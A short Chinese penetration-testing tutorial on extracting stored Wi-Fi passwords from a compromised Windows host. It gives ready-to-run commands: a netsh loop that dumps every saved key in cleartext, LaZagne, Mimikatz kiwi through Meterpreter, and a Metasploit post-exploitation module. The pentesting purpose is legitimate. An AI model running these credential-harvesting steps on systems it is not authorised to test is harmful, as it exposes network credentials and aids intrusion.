所有Wi-Fi密码及其各自的SSID都存储在以下目录下的XM文件中:
C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\***L
Netsh是微软自己提供的脚本工具,它可以在命令提示符下使用,也可以在Windows PowerShell中使用,Netsh是networkshell的缩写,执行时它可以提供详细的有关系统曾经拥有的网络配置的信息,包括曾经连接到的无线网络的凭据,此实用程序附带各种可用于根据要求获取各种信息的参数
我们可以使用以下命令获取设备已连接的SSID列表:
netsh wlan show profiles
通过上面的命令可以看到从过去或现在连接到系统支持的Wi-Fi网络的名称,如果要获取上述任一SSID的密码,可以使用以下命令:
获取所有历史连接WIFI的密码:
for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear
LaZagne是一个开源工具,用于检索存储在数据库中的所有密码,它可以用于提取WIFI密码信息(需要管理员权限):
lazagne.exe wifi
另一种在渗透测试中非常有用的方法是使用Mimikatz,我们可以在后渗透测试阶段通过执行以下命令来获取WIFI密码信息:
getsystem
load kiwi
wifi_list_shared
Metasploit框架也集成了用于获取WIFI密码的模块,我们可以通过执行以下命令来获取WIFI密码信息:
use post/windows/wlan/wlan_profile
set session 1
exploit
下载地址:http://www.nirsoft.net/utils/wireless_key.html
工具描述:WirelesskeyView是一个简单的软件,用于访问包含无线密码的XML文件并以明文形式显示它们,此工具可用于恢复丢失和遗忘的WIFI密码,在渗透测试中也是一种可选择的凭据获取方法
工具使用:
除了上面介绍的几种方法之外我们还可以通过手动查询的方式来获取当前WIFI密码信息:
文末小结
本篇文章只是简单的介绍了一下如何获取Wireless凭据信息,其实在内网渗透过程中我们获取的信息面要比这广泛的更多,例如:数据库信息、应用信息(向日葵、Teamview、FlashXP等)、主机散列、用户密码等等,后续有时间再逐一介绍